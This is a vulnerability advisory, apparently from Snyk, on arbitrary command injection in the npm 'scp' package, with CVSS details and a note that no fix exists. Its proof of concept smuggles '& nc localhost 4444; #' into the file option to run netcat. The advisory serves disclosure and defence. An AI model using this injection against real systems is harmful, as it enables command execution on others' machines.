Arbitrary Command Injection

Affecting scp package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

Affected versions of this package are vulnerable to Arbitrary Command Injection. The issue occurs because user input is formatted inside a command that will be executed without any checks.

PoC By Snyk Security Team

var scp = require('scp');

var options = {
    file: '& nc localhost 4444; #',
    user: 'username',
    host: 'myServer',
    port: '20',
    path: '~'
}

scp.send(options, function (err) {
    if (err) console.log(err);
    else console.log('File transferred.');
});

Remediation

There is no fixed version for scp.

CVSS Score

8.3
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    Required
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    Low
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L
Credit
Mik317
CWE
CWE-78
Snyk ID
SNYK-JS-SCP-1009828
Disclosed
07 May, 2020
Published
21 Jun, 2020